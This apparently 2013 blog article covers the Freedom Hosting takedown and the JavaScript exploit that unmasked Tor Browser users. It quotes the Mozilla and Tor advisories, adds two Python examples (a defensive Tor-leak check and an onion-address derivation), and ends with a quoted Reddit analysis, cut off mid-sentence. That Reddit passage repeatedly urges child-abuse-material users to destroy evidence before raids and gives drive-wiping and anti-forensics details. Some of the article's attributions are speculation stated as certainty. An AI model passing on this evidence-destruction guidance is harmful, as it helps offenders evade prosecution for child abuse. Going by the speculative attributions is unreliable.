Freedom Hosting – Tor onion site takedown
U.S. authorities have arrested 28-year-old Eric Eoin Marques, the alleged owner of Freedom Hosting, the largest Deep Web hosting platform on the planet. The arrest was made in Dublin, Ireland (Marques was born in the United States but moved to Ireland when he was five years old), with the takedown reportedly disrupting a large part of the Tor network which is, sadly, the secretive web underworld home of the majority of all illegal online activity. It is also believed that in the process, the United States (or someone) secretly planted a malicious JavaScript-based “virus” (“malware” would be a more accurate term) on many Onion websites. The purpose of the malicious script is believed to be, of course, to uncloak and reveal the identities of those using the anonymous Tor network. On the plus side, it is believed that by removing this single host from the Tor network, they have effectively removed “the majority of all online child pornography”.
Anonymous Onion sites, which are accessed through the onion protocol, are hosted the same as regular World Wide Web sites but are addressed through a .onion address in order to direct requests to a server that remains “hidden” and route the data back to the anonymous users. The design of the Tor network ensures that the user cannot know where the server is located and the server cannot find out the IP address of the user (except by intentional malicious means like hidden tracking code embedded in web pages delivered by the server – but we’ll get to that later). Although anonymously addressed, onion site owners must run their sites with a hosting provider that accepts payment in anonymous currency and will willingly turn a blind eye to the contents of the server it is hosting. The largest such service, as of this week, was Freedom Hosting.
As justification for the raid, in a related extradition hearing last week, the FBI described Marques as the “largest facilitator of child porn on the planet”, with “facilitator” being the key word here. Marques will most certainly argue that he was simply providing an anonymous service with no knowledge of what was being hosted on his company’s servers. Regardless, history has taught us that Marques is likely to be prosecuted and jailed for a long, long time (hey, Anonymous warned him to clean up his act way back in 2011). The arrest warrant for Marques was issued July 29 by the U.S. attorney general in Maryland, with the takedown of Freedom Hosting occurring just a few days later.
Malicious JavaScript injection related to the takedown
In what is most certainly related to the takedown, Tor users noted an odd occurrence shortly before the raid on Freedom Hosting took place. It was reported that Tor users, specifically users of the Windows version of the Tor browser bundle, began to notice odd JavaScript code running on certain onion websites, specifically those hosted by Freedom Hosting. Thus far, nobody is sure how the malware managed to infect Freedom Hosting servers, but it is believed that the purpose of the malicious code was to identify users of its systems.
Extreme Tech noted that the script “seemed to exploit a loophole in JavaScript” that is present on unpatched versions of the Firefox browser (Firefox 17, the version shipped in the Tor Browser Bundle (TBB), a popular bundle for Tor users). It was noted that the JavaScript reported back to a server hosted on an open web server (i.e. not a hidden Tor service) located in the Washington, DC area (65.222.202.51, 65.222.202.53 or 65.222.202.54, port 80).
Tor’s Hidden Wiki website quickly posted a warning:
A recent security threat has been noted on Hidden Services hosted by Freedom Hosting. Please be sure to update your Tor Browser Bundle and disable JavaScript. Further information can be found on OnionNews or the Independent.ie. More info on the Onion subreddit. Ranger Feina (talk) 14:40, 5 August 2013 (UTC)
Israel-based Cyberhat Security reported that the script, which is injected through an iFrame-based browser attack, does a simple GET to a server hosted off the anonymous Tor network (i.e. on the open internet). In the process, a unique identifying tag is passed to the server. Information Week explained how the exploit worked:
“Based on a teardown of the malware, it was an iFrame injection script designed only to plant a universally unique identifier (UUID) on a target’s computer. ‘Ironically, all the malicious script does is perform a GET request to a new domain, which is hosted outside of the Tor network, while transferring the same UUID to the server. That way, whoever is running this exploit can match any Tor user to his true Internet address, and therefore track down the Tor user.’
Multiple security researchers have said the relative non-maliciousness of the attack suggests that it may have been the work of a law enforcement agency (LEA) such as the FBI. ‘Because this payload does not download or execute any secondary backdoor or commands it’s very likely that this is being operated by an LEA and not by blackhats.'”
Some Tor users suspect that the malicious script crept inside the Tor network from OnionBank, which was allowed to link “donation” graphics on several prominent onion web sites. This had been a hot topic on Tor for some time with many pointing out the potential security vulnerability the link would introduce.
That the U.S. is behind the attack is a certainty. It is known that the United States has used viruses and malware in the past to penetrate the defenses of illegal servers (or of countries it is at odds with). As of the time of this writing, the malware is believed to still be present on the Tor network. One panicked onion site owner posted the following warning on his chat boards:
UNKNOWN JAVASCRIPT IN THE BOARD PAGES POINTING TO IFRAME TO A VERIZON SERVER ON THE OPEN WEB!!!!!!! THEY ARE INSERTED BY FH [Freedom Hosting]! I WOULD CONSIDER FH COMPROMISED!!!! THEY ARE ALSO IN TLZ AND OTHER SITES PAGES!! STAY AWAY FROM ALL FH HOSTED SITES, including TLZ [The Love Zone], LC [Lolita City], TORMAIL, ALL OF THESE ARE HOSTED ON FH!!!!!!!!!!!!!! ALL BOARDS HAVE BEEN DELETED TO PROTECT YOU!! IF THE BOARDS COME BACK UP, IT IS NOT ME RUNNING THE SITE ANYMORE, ALL ADMIN/MOD ACCOUNTS HAVE BEEN DELETED!!
The attack should not have been totally unexpected. Tor troubles have been brewing as of late including arrests of prominent Tor users and attacks against major sites. According to Naked Security:
“The ‘deep web’ operating inside the Tor cloud has been hit by internal issues of late, with a major criminal message board being hijacked and defrauded by one of its own trusted admins.”
Who the Tor takedown script targets and how to disable it
The unexpected (do we dare call it “ingenious”?) takeover has caused concern for legitimate Tor users, who rely on the service to protect them from government snooping and/or to provide freedom of speech to areas where it might otherwise be denied. Notwithstanding the “pedos” (aka Chester the Molester) that are now frantically wiping their hard drives and planning overseas trips, some users may now literally fear for their lives.
Why now and Whodunnit?
Before we understand the how, it helps to understand the why.
That the intent of the takedown was to shut down prominent child pornography websites can’t be argued. But why now, after these sites have run unhindered for many years? When news first broke and the arrest was credited to the FBI, reporters assumed that meant the FBI was solely behind the investigation. Not likely. The IP address (reported variously as 65.222.202.51, 65.222.202.53 or, most likely, 65.222.202.54) has been traced back to SAIC, an NSA (and FBI, DARPA, and CIA) contractor with, oddly enough, plenty of ties to Verizon Wireless (why does Verizon’s name keep popping up in these instances?). Although the NSA is not known for child pornography investigations, the takedown could be related to increasingly harsh public criticism of NSA policies that allow unfettered surveillance of all United States citizens. As the public’s complaint of privacy rights violations grows louder, the United States government’s era of “unrestricted spying” may be coming to an end.
Regardless, in all likelihood, the NSA did the grunt work and the FBI cleaned up after the fact. Not hiding their true IP address (the source’s IP was easily traced to Washington, DC) is a bold move – or a calling card purposely left behind. Hey, we have China conducting foreign attacks from their national headquarters. Maybe this is the new norm…
Or the takedown could be related to the fact that the Firefox flaw which allowed the JavaScript injection was encountered and publicly disclosed in a security advisory about six weeks ago. Possibly the feds heard about the flaw, recognized the opportunity, and moved quickly before the patch was widely available (as we’ll discuss more below, the attack was directed at Windows users – not the most wily users when it comes to proper, and safe, Tor usage).
Or possibly the timing of the arrest and Freedom Hosting shutdown is related to the fact that most blackhat hackers are at the DEF CON conference in Las Vegas this week. One hacker quipped:
“FBI uploads malicious code on the deep websites while everyone is off at DEF CON. Talk about playing dirty.”
The flaw and patch
The Windows-specific Firefox flaw exploited by the injection script was patched on June 25, 2013, with the release of Firefox 22 and Firefox Extended Support Release (ESR) version 17.0.7. According to Information Week:
“People who are on the latest supported versions of Firefox are not at risk. Although the vulnerability affects users of Firefox 21 and below, the exploit targets only ESR-17 users. Since this attack was found on Tor hidden services, presumably that is because the Tor Browser Bundle (TBB) is based on Firefox ESR-17. Users running the most recent TBB have all the fixes that were applied to Firefox ESR 17.0.7 and were also not at risk from this attack.”
A simple solution to the problem is, of course, to disable JavaScript in the web browser entirely (something Tor has always recommended and smart Tor users already do).
Here’s the original Firefox security advisory:
Advisory 2013-53
Execution of unmapped memory through onreadystatechange event
Impact: Critical
Announced: June 25, 2013
Reporter: Nils
Products: Firefox, Thunderbird, Seamonkey
Fixed in: Firefox 22.0
Firefox ESR 17.0.7
Thunderbird 17.0.7
Thunderbird ESR 17.0.7
SeaMonkey 2.19
Description: Security researcher Nils reported that specially crafted web content using the onreadystatechange event and reloading of pages could sometimes cause a crash when unmapped memory is executed. This crash is potentially exploitable.
Tor Announce issued this advisory shortly after the attack.
[tor-announce] Tor security advisory: Old Tor Browser Bundles vulnerable
Roger Dingledine arma at mit.edu
Mon Aug 5 15:13:12 UTC 2013
SUMMARY:

This is a critical security announcement. An attack that exploits a Firefox vulnerability in JavaScript [1] has been observed in the wild. Specifically, Windows users using the Tor Browser Bundle (which includes Firefox plus privacy patches [2]) appear to have been targeted.

This vulnerability was fixed in Firefox 17.0.7 ESR [3]. The following versions of the Tor Browser Bundle include this fixed version:

2.3.25-10 (released June 26 2013) [4]
2.4.15-alpha-1 (released June 26 2013) [4]
2.4.15-beta-1 (released July 8 2013) [5]
3.0alpha2 (released June 30 2013) [6]

Tor Browser Bundle users should ensure they're running a recent enough bundle version, and consider taking further security precautions as described below.

WHO IS AFFECTED:

In principle, all users of all Tor Browser Bundles earlier than the above versions are vulnerable. But in practice, it appears that only Windows users with vulnerable Firefox versions were actually exploitable by this attack. (If you're not sure what version you have, click on "Help -> About Torbrowser" and make sure it says Firefox 17.0.7. Here's a video: [7])

To be clear, while the Firefox vulnerability is cross-platform, the attack code is Windows-specific. It appears that TBB users on Linux and OS X, as well as users of LiveCD systems like Tails, were not exploited by this attack.

IMPACT:

The vulnerability allows arbitrary code execution, so an attacker could in principle take over the victim's computer. However, the observed version of the attack appears to collect the hostname and MAC address of the victim computer, send that to a remote webserver over a non-Tor connection, and then crash or exit [8]. The attack appears to have been injected into (or by) various Tor hidden services [9], and it's reasonable to conclude that the attacker now has a list of vulnerable Tor users who visited those hidden services.

We don't currently believe that the attack modifies anything on the victim computer.

WHAT TO DO:

First, be sure you're running a recent enough Tor Browser Bundle. That should keep you safe from this attack.

Second, be sure to keep up-to-date in the future. Tor Browser Bundle automatically checks whether it's out of date, and notifies you on its homepage when you need to upgrade. Recent versions also add a flashing exclamation point over the Tor onion icon. We also post about new versions on the Tor blog: https://blog.torproject.org/

Third, realize that this wasn't the first Firefox vulnerability, nor will it be the last [10]. Consider disabling JavaScript (click the blue "S" beside the green onion, and select "Forbid Scripts Globally"). Disabling JavaScript will reduce your vulnerability to other attacks like this one, but disabling JavaScript will make some websites not work like you expect. A future version of Tor Browser Bundle will have an easier interface for letting you configure your JavaScript settings [11]. You might also like Request Policy [12]. And you might want to randomize your MAC address, install various firewalls, etc.

Fourth, consider switching to a "live system" approach like Tails [13]. Really, switching away from Windows is probably a good security move for many reasons.

And finally, be aware that many other vectors remain for vulnerabilities in Firefox. JavaScript is one big vector for attack, but many other big vectors exist, like css, svg, xml, the renderer, etc. We need help improving usability of (and doing more security analysis of) better sandboxing approaches [14] as well as VM-based approaches like Whonix [15] and WiNoN [16]. Please help!

[1] https://www.mozilla.org/security/announce/2013/mfsa2013-53.html
[2] https://www.torproject.org/projects/torbrowser/design/
[3] https://blog.mozilla.org/security/2013/08/04/investigating-security-vulnerability-report/
[4] https://blog.torproject.org/blog/new-tor-browser-bundles-and-tor-02414-alpha-packages
[5] https://blog.torproject.org/blog/tor-02415-rc-packages-available
[6] https://blog.torproject.org/blog/tor-browser-bundle-30alpha2-released
[7] https://media.torproject.org/video/2013-08-05-TBBversion.mp4
[8] http://tsyrklevich.net/tbb_payload.txt
[9] https://blog.torproject.org/blog/hidden-services-current-events-and-freedom-hosting
[10] https://www.mozilla.org/security/known-vulnerabilities/firefoxESR.html
[11] https://trac.torproject.org/projects/tor/ticket/9387
[12] https://www.requestpolicy.com/
[13] https://tails.boum.org/
[14] https://trac.torproject.org/projects/tor/ticket/7680
[15] http://sourceforge.net/projects/whonix/
[16] http://dedis.cs.yale.edu/2010/anon/papers/osdi12.pdf
     https://trac.torproject.org/projects/tor/ticket/7681
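The IMPACT section of the advisory above makes a point a defender can act on: the payload phoned home "over a non-Tor connection", meaning the browser process opened a direct TCP connection to a clearnet web server instead of going through the local tor daemon. On a machine running the Tor Browser Bundle the browser should only ever talk to tor itself, so a host firewall or connection log that shows firefox reaching anything else is a strong leak indicator. The script below is an added example written for this page, not code from the page or from the Tor Project. It assumes the TBB 2.x defaults (SOCKS on 127.0.0.1:9150, control port 127.0.0.1:9151 used by Torbutton); the log format and all addresses in SAMPLE_LOG are constructed, using TEST-NET ranges.

```python
"""Flag Tor Browser connections that bypass the local Tor SOCKS proxy.

Added example (defender's check), not code from the original page or from
the Tor Project. Policy: the browser process may only reach the local tor
daemon (assumed TBB 2.x defaults 127.0.0.1:9150 SOCKS and 127.0.0.1:9151
control); any other destination from that process is a leak. tor.exe itself
is not policed here, since it legitimately reaches relays.
The log lines are CONSTRUCTED in a made-up host-firewall format.
"""
import re

# Assumption: TBB 2.x default ports; adjust to the ports your bundle uses.
ALLOWED = {
    "firefox.exe": {("127.0.0.1", 9150), ("127.0.0.1", 9151)},
}

# <timestamp> <process> <src ip:port> -> <dst ip:port> <proto>
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<proc>\S+)\s+(?P<src>\S+)\s+->\s+"
    r"(?P<dhost>[\d.]+):(?P<dport>\d+)\s+(?P<proto>TCP|UDP)$"
)

# Constructed sample: one SOCKS connection, one Torbutton control connection,
# tor reaching a relay, a DNS lookup by another process, and one direct
# clearnet HTTP connection from the browser (the leak).
SAMPLE_LOG = """\
2013-08-04T23:58:01Z firefox.exe 192.168.1.20:51234 -> 127.0.0.1:9150 TCP
2013-08-04T23:58:02Z tor.exe 192.168.1.20:51235 -> 198.51.100.7:9001 TCP
2013-08-04T23:58:09Z firefox.exe 192.168.1.20:51240 -> 127.0.0.1:9151 TCP
2013-08-04T23:58:30Z firefox.exe 192.168.1.20:51241 -> 192.0.2.54:80 TCP
2013-08-04T23:58:31Z svchost.exe 192.168.1.20:51242 -> 192.168.1.1:53 UDP
"""


def parse_line(line):
    """Parse one log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["dport"] = int(rec["dport"])
    return rec


def find_leaks(log_text, allowed=ALLOWED):
    """Return (timestamp, process, 'host:port') for each connection a policed
    process made to a destination outside its allow-list."""
    leaks = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["proc"] not in allowed:
            continue  # unparseable, or a process we do not police
        if (rec["dhost"], rec["dport"]) not in allowed[rec["proc"]]:
            leaks.append((rec["ts"], rec["proc"],
                          "%s:%d" % (rec["dhost"], rec["dport"])))
    return leaks


if __name__ == "__main__":
    for ts, proc, dst in find_leaks(SAMPLE_LOG):
        print("LEAK %s %s -> %s (direct connection bypassing Tor)" % (ts, proc, dst))
```

The same allow-list can be enforced rather than merely logged by a host firewall rule that blocks the browser process from everything except the tor ports; the advisory's mention of firewalls points the same way.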
Sites known to be impacted by the takedown
Here’s a partial list of sites that are now down. Yes, some sites on the list will make you not feel so sorry for Eric Marques, but remember, the intent of Tor is to provide anonymity, not to distribute porn, bestiality, or snuff pics. Note that Tormail, by far the most popular Tor-based anonymous email service, was hosted by Freedom Hosting and is now effectively in the hands of the feds.
Tormail (Wow!), Onion Bank, PedoEmpire, Lolita City, HackBB, TCF, LR, FH, Torimages, The Laboratory, Bitcoin Fog (this one’s a bit sketchy right now)
Life goes on
Yikes – what about The Silk Road?
And for those that are wondering, The Hidden Wiki and Silk Road (prominent and popular Tor websites) seem to have been unaffected by the outage. That being said, you’re a fool if you think they’re not next in line. You’ve been warned.
Tor-pedo chatter
Chatter on Tor is that angry pedo (Chester the Molester) users are planning some pretty serious retribution – or so they say. The pedos have never been considered the sharpest tack in the box so I’m not so sure I’d worry too much (I think they’re the reason JavaScript is turned on by default in the TBB bundle). Here’s what one pedo goof posted shortly after the takedown:
“What this is about is the USA Empire opposing the idea of men having little girl wives. Of the man being the master (ba’al) as written in Deuteronomy. It enforces its will world wide, making a world fit for women but not for men. The only solution will probably be a world war. The USA belief system, since it has taken over the whole world and will not stop, needs to be supplanted, no matter what.”
Marques’ status and Tor reaction
Eric Marques, who also owns Host Ultra Unlimited, is being held without bail in Ireland (he was classified as a flight risk and his bail request was denied) and is awaiting extradition to the United States. Tor itself has already released a statement clarifying the nature of its service and disavowing any relationship with Marques or Freedom Hosting. Here’s their full statement:
Hidden Services, Current Events, and Freedom Hosting
Posted August 4th, 2013 by phobos
Around midnight on August 4th we were notified by a few people that a large number of hidden service addresses have disappeared from the Tor Network. There are a variety of rumors about a hosting company for hidden services: that it is suddenly offline, has been breached, or attackers have placed a javascript exploit on their web site.
A Hidden service is a server – often delivering web pages – that is reachable only through the Tor network. While most people know that the Tor network with its thousands of volunteer-run nodes provides anonymity for users who don’t want to be tracked and identified on the internet, the lesser-known hidden service feature of Tor provides anonymity also for the server operator.
Anyone can run hidden services, and many do. We use them internally at The Tor Project to offer our developers anonymous access to services such as SSH, IRC, HTTP, and our bug tracker. Other organizations run hidden services to protect dissidents, activists, and protect the anonymity of users trying to find help for suicide prevention, domestic violence, and abuse-recovery. Whistleblowers and journalists use hidden services to exchange information in a secure and anonymous way and publish critical information in a way that is not easily traced back to them. The New Yorker’s Strongbox is one public example.
Hidden service addresses, aka the dot onion domain, are cryptographically and automatically generated by the tor software. They look like this: http://idnxcnkne4qt76tg.onion/, which is our torproject.org website as a hidden service.
There is no central repository nor registry of addresses. The dot onion address is both the name and routing address for the services hosted at the dot onion. The Tor network uses the .onion-address to direct requests to the hidden server and route back the data from the hidden server to the anonymous user. The design of the Tor network ensures that the user can not know where the server is located and the server can not find out the IP-address of the user, except by intentional malicious means like hidden tracking code embedded in the web pages delivered by the server. Additionally, the design of the Tor network, which is run by thousands of volunteers, ensures that it is impossible to censor or block certain .onion-addresses.
The person, or persons, who run Freedom Hosting are in no way affiliated or connected to The Tor Project, Inc., the organization coordinating the development of the Tor software and research. In the past, adversarial organizations have skipped trying to break Tor hidden services and instead attacked the software running at the server behind the dot onion address. Exploits for PHP, Apache, MySQL, and other software are far more common than exploits for Tor. The current news indicates that someone has exploited the software behind Freedom Hosting. From what is known so far, the breach was used to configure the server in a way that it injects some sort of javascript exploit in the web pages delivered to users. This exploit is used to load a malware payload to infect user’s computers. The malware payload could be trying to exploit potential bugs in Firefox 17 ESR, on which our Tor Browser is based. We’re investigating these bugs and will fix them if we can.
As for now, one of multiple hidden service hosting companies appears to be down. There are lots of rumors and speculation as to what’s happened. We’re reading the same news and threads you are and don’t have any insider information. We’ll keep you updated as details become available.
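The Tor statement above says that .onion names are "cryptographically and automatically generated by the tor software" and that there is "no central repository nor registry". The following is an added example, not code from the page or from the Tor Project, showing how a hidden-service address of that era (what Tor later called a v2 address) was derived: the service's RSA-1024 public key is DER-encoded as a PKCS#1 RSAPublicKey, SHA-1 hashed, and the first 80 bits of the digest are base32-encoded to give the 16-character name. CONSTRUCTED_MODULUS is a placeholder of the right shape, not any real service's key, so the name it prints does not correspond to a real service.

```python
"""Derive a 2013-era (v2) Tor hidden-service address from an RSA public key.

Added example, not code from the page or from the Tor Project. The tor
daemon derived the name as
    base32( SHA-1( DER(RSAPublicKey) )[:10] ).lower() + ".onion"
i.e. the first 80 bits of the SHA-1 digest of the service's RSA-1024 public
key in PKCS#1 form: SEQUENCE { modulus INTEGER, publicExponent INTEGER }.
CONSTRUCTED_MODULUS below is a placeholder, not any real service's key.
"""
import base64
import hashlib


def _der_length(n):
    """DER length octets: one byte below 128, else 0x80|count then big-endian bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _der_integer(value):
    """DER INTEGER (non-negative): minimal big-endian bytes, with a leading
    0x00 whenever the top bit is set so the value is not read as negative."""
    if value < 0:
        raise ValueError("RSA key components are non-negative")
    body = value.to_bytes(max(1, (value.bit_length() + 7) // 8), "big")
    if body[0] & 0x80:
        body = b"\x00" + body
    return b"\x02" + _der_length(len(body)) + body


def der_rsa_public_key(modulus, exponent):
    """PKCS#1 RSAPublicKey ::= SEQUENCE { modulus INTEGER, publicExponent INTEGER }."""
    content = _der_integer(modulus) + _der_integer(exponent)
    return b"\x30" + _der_length(len(content)) + content


def onion_v2_address(modulus, exponent=65537):
    """16 base32 characters (80 bits of the SHA-1 digest) plus the .onion suffix."""
    digest = hashlib.sha1(der_rsa_public_key(modulus, exponent)).digest()
    return base64.b32encode(digest[:10]).decode("ascii").lower() + ".onion"


# Constructed 1024-bit placeholder: deterministic bytes with the top and low
# bits set so it has the shape of an RSA-1024 modulus. Not a real key.
_seed = hashlib.sha512(b"constructed placeholder, not a real hidden-service key").digest()
CONSTRUCTED_MODULUS = int.from_bytes(_seed * 2, "big") | (1 << 1023) | 1

if __name__ == "__main__":
    print(onion_v2_address(CONSTRUCTED_MODULUS))
```

Because the name is a digest of the public key, whoever holds the matching private key can prove ownership of the name to a client, and nobody can register or seize the name ahead of them, which is what the statement means when it says the address is "both the name and routing address" and that there is no registry. The flip side, also visible above, is that only 80 bits of the hash are kept.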
[sarcasm] The feds officially refused to comment for this article but one fed told Geek Slop, off the record:
Hey, we paid for the thing in the first place!
Technical stuff for the nerds:
Reddit analysis of the JavaScript code
Below is the Reddit analysis of the malicious code. It points out the version of Firefox that was vulnerable and notes that only Windows users with JavaScript enabled were impacted. The analysis also notes that, to avoid drawing attention with extraneous <script> tags, the code was cleverly launched from an error handler on a non-existent image file. The complete code from the exploit is located below.
1. It runs only if Javascript was enabled and affects Firefox 17 on Windows. The exploit used (MFSA 2013-53) was fixed in Firefox 17.0.7, which is the one used in the latest Tor Browser Bundle, and relies on Windows libraries to execute its payload. If you were using an outdated Tor Browser on Windows and you had Javascript enabled (it is by default) then you have definitely been compromised. If you were using Tor on any other OS, had disabled Javascript, or had the latest version of the Tor Browser Bundle (Torbrowser – Help – About shows the version, which must be 17.0.7 or higher) then you are safe and your public IP has not been transmitted anywhere.
2. The exploit has only been online since after the servers came back on August 3rd, 2013. Now read on for the details…
3. By default, the Tor Browser comes with NoScript set to “Allow All Javascript Globally”, meaning that Javascript is enabled by default. They do this to make it convenient for users which is why it’s the default setting even though it’s not safe.
4. If you were running an exploitable version of the Tor Browser on Windows and didn’t either manually set NoScript to “Forbid Javascript Globally” or disabled Javascript entirely via the Firefox settings, then you are absolutely 100% busted. But if you had disabled Javascript like smart people kept telling you, using either of the two methods mentioned, then the code never executed and you are safe.
5. The FreedomHosting compromise consisted of a small, non-existent image <img> tag injected into all Freedom Hosting sites, and this <img> tag contained an <img onerror=""> event attribute. The fact that the image was missing meant that the “onerror” code ran and retrieved the rest of the code from another Onion site. They did it this way via a small, hidden image to avoid drawing attention to any obvious <script> tags.
6. The main payload (main exploit code) from that onion site then created an iframe and set a cookie in it (the sole purpose of which was to reliably identify your unique browser as you traveled between different compromised FH sites, to build a list of which FH sites you’ve been visiting) and more importantly ran some 0-day exploits using heap overflows to run any code they desired and escape the Tor sandbox.
7. The 0day exploit code executed some functions that revealed your public internet IP address, MAC address, local hostname (such as “LarrysPC”) and what Freedom Hosting site you were browsing (they used a unique UDID for each compromised website) and sent it all to a clear-net IP in Washington. This is no joke. I wish I was kidding. It really did this! They transmit your unique browser ID (cookie value) over the clear internet to their public-internet server, thus giving them a physical person tied to the “random person” they’ve been observing browsing the different FH sites. With this connection performed, they know your public IP, they have the computer’s hostname & MAC address to conclusively identify your computer, they have your unique browser ID cookie, and they have a full list of Freedom Hosting sites that have been viewed by that unique browser. They know exactly how deeply you are involved and their lists allow them to target the people that are clearly intentionally seeking out illegal content.
8. The use of zero-day exploits means that the attacker had the huge resources required to find such completely new exploits, and is therefore most likely the government. [Geek Slop note: this statement is incorrect. The vulnerability has been known for several weeks]
9. The fact that FreedomHosting was compromised means that the attacker either physically seized the servers and installed the code (government), or managed to exploit the webserver software (other malicious attacker). Considering recent news reports, it is clear that it was the government.
10. The fact that the clear-net IP collecting all the data is in Washington and that FreedomHosting is now down without a word suggests that the attacker was in fact the FBI.
11. The attacker now has the public IP addresses + what FreedomHosting site you were viewing of everybody that had Javascript enabled on Windows with an outdated Tor Browser Bundle. You better prepare to be raided. Destroy all the evidence now, if your freedom depends on it.
12. The cookie is called “n_serv” and can be viewed under Tor Button – Cookie Protections. By default, Tor is set to erase all non-protected cookies on browser restarts (and to make all cookies non-protected unless explicitly told by the user to protect certain cookies). This means that the “n_serv” cookie will not persist between browser restarts, unless the FBI has made part of their exploit code tell Tor Button to protect the cookie. That is very unlikely, though, as it would be difficult to do so and wouldn’t do them much good, since the cookie changing its value doesn’t actually harm their operation. They will still get your public IP for every unique browser ID that’s being transmitted to them, so it doesn’t matter to them if the cookie gets cleared and the browser ID changes.

Therefore, due to the fact that the cookie clears itself on restart, the only way to know if you’ve been affected if you’re running a vulnerable browser bundle is if your browser has been running non-stop since before FreedomHosting went down. Meaning that your browser has been running for at least 1 week, preferably 2 or more. If you’ve got no “n_serv” cookie in a session that has lasted that long then you conclusively know that the exploits have never successfully executed on your machine. The cookie only clears on browser restart.

I’ve always been using NoScript in “Forbid Javascript Globally” mode, my last browser restart was over 2 weeks ago and I am 100% sure I have browsed some FH sites before they went offline and without restarting this browser and I don’t have the cookie. People that have either set NoScript to globally forbid, or disabled Javascript entirely in the Firefox settings, are therefore conclusively safe. Everyone else will have been infected and can check for the existence of that cookie to verify that fact (will only be there if their browser hasn’t restarted in the past few weeks).
Note that the cookie will be created if Javascript is enabled, but the exploit that transmits your public IP to tie that cookie to your identity is a separate action and will only run on exploitable (outdated) Tor Browser Bundles on Windows. Therefore, the existence of the cookie is not enough reason to panic yet. If you’re using Windows and you’ve got a Javascript-enabled Tor Browser that’s older than 17.0.7 then your identity has absolutely been compromised.
13. Previous news reports from July 29th, 2013 show that the FBI performed a nationwide “child sex trafficking” bust, freeing 105 children and arresting 150 pimps/ring leaders (www.fbi.gov/news/stories/2013/july/operation-cross-country-recovering-victims-of-child-sex-trafficking/operation-cross-country-recovering-victims-of-child-sex-trafficking).
14. Other news from July 29th, 2013 shows that the FBI is trying to extradite “the biggest child-porn facilitator on the planet” from Ireland (www.independent.ie/irish-news/courts/fbi-bids-to-extradite-largest-childporn-dealer-on-planet-29469402.html). Seems that the FH admin was a 28 year old that was arrested in Ireland and that the javascript exploits were set up in a joint-operation between the FBI and the Irish law enforcement since all collected IPs were sent to the FBI. If this is the guy, then Freedom Hosting is never coming back, and he’s looking at a lot of jailtime.
15. Also consider the fact that the attackers installed code that uniquely identifies each FreedomHosting site you were visiting, since FH served much more than just child porn. The FBI wouldn’t want to bust down the doors of people that were looking at relatively harmless stuff from FreedomHosting. They really cared about knowing which specific sites you were viewing and took many steps to ensure that they accurately tracked which sites you visited, through the use of per-site UDIDs and a tracking cookie.
16. Timeline of events: FreedomHosting admin starts accepting BitCoins a few months ago. The FBI traces his BitCoin transactions to withdrawals into a real-world bank account via currency exchange services, thus revealing the identity of the FH admin, and an arrest is made on July 29th, 2013 in Ireland. The servers were then shut down. On August 3rd, 2013 the sites came back online with the exploit code installed.
17. It is pretty conclusive: Get a fucking move on if you were too stupid to disable Javascript, keep Tor Browser Bundle updated, were running Windows, and visited any of the FH sites after they came back online. You do not have much time. Someone in Washington, otherwise known as the FBI, now has your public IP and a list of which FH sites you were browsing. GET A FUCKING MOVE ON! NOW! Destroy everything before you end up behind bars! Remember to run multiple secure wipe-passes of your entire hard drives so that NOTHING can be recovered, and remember that encryption alone is not safe enough, data leaks out of your encrypted containers into the operating system’s thumbnail caches. They might not be able to view your actual encrypted TrueCrypt images, but they sure as hell can see what kind of images you had been looking at in the past (Windows has a global thumbnail database containing smaller versions of all Thumbs.db contents from every drive on the system, Mac OS has a QuickLook cache of everything you have ever viewed, and Linux has similar leaks depending on what image viewers you were using). Also remember that they can force you to give up encryption keys (and even sentence you harshly based on suspicion if you refuse to give it out), so it’s definitely not safe to keep encrypted TrueCrypt containers. Your freedom should be worth more than that. Take no chances. Perform a full 3-pass random DBAN (http://www.dban.org/) format of ALL hard disks that were used for child porn AND ALL operating system disks related to that! We are on the verge of a global law-enforcement crackdown unlike anything else ever before once the FBI uses the data they have collected, and you may only have a few days until the knock comes. Don’t waste time with 35-pass erases, it takes days and they may knock on the door sooner than it can finish and research shows that even a single-pass erase is safe enough, but I would do 3 random passes just to be extra safe. 
Good luck everyone and may God be with you. Time to brace for impact. And remember that silence does not mean that nothing is going on. People that are getting busted won’t have any time to connect to Tor and let others know they’ve been busted. Silence does not mean that busts are not taking place. The FBI is taking this FreedomHosting compromise as the biggest victory in human history. You should treat it with equal respect and do everything in your power to stay safe. This is the calm before the storm. You will see the victims being paraded around in a giant FBI press release within a month or two.
18. For those that had blocked Javascript and are safe: It’s now a good idea to remember that Tor should never be trusted, and that any content from Tor sites can be compromised at any time. Always be sure to update your media players such as VLC to the latest versions to protect against exploits in media files. There are no signs that such tampering has taken place, but this is a good time to remind people to be smart. How to be as safe as you can be: 1: Keep Tor Browser Bundle up to date every time you get an update notification. 2: Always disable Javascript. 3: Always keep all your software fully updated. 4: Run everything in a Virtual machine (VirtualBox is free) to avoid data leaking out into your main OS. 5. Use Linux in that VM even if you are primarily a Windows user, because Linux is a fuckton more resilient against attacks. 6: Use encrypted containers inside the VM if your freedom depends on your data being safe from prying eyes. 7: Trust no one. Never reveal personal info on Tormail (now compromised) or even Torchat. You never want to leak anything that leads back to you. Always assume that everyone is out to get you and you will never have the issue of trusting the wrong person.
19. More warnings (TORMAIL): The hidden service for Tormail has been compromised since it ran on FreedomHosting. It’s therefore very likely that all the contents of your Tormail inboxes are in their hands. Do not log into your accounts. Depending on how Tormail works, your emails might possibly have been stored in encrypted form in the database and will only be decrypted whenever you log in. In that case, they can only read them by installing a backdoor that makes unencrypted copies as soon as someone logs into their account. Logging in would thereby give them the unencrypted versions. Alternatively, if Tormail already stored everything unencrypted then they already have a complete copy of it and no logging-in-and-deleting will do any good whatsoever. Unfortunately everything points towards Tormail just using a regular IMAP mail server hosted on Freedom Hosting (because of how they allowed regular Roundcube / SquirrelMail access to your mailbox, both of which are just regular unencrypted IMAP web clients), and that would mean that all plaintext emails are already in the FBI’s hands and there’s nothing you can do about it. Do not log in. Logging in can only make things worse! Tormail is guaranteed to be a major part of this sting because it (along with certain private messaging systems on boards) is the most likely place where people will reveal their true identities to people they’ve trusted. Tormail has been compromised and all you can do now is NOT log in, and pray that everything was stored as decrypt-on-demand via custom IMAP server software (unfortunately extremely unlikely because no off-the-shelf IMAP servers offer encrypted email storage). That, and destroy all the evidence so 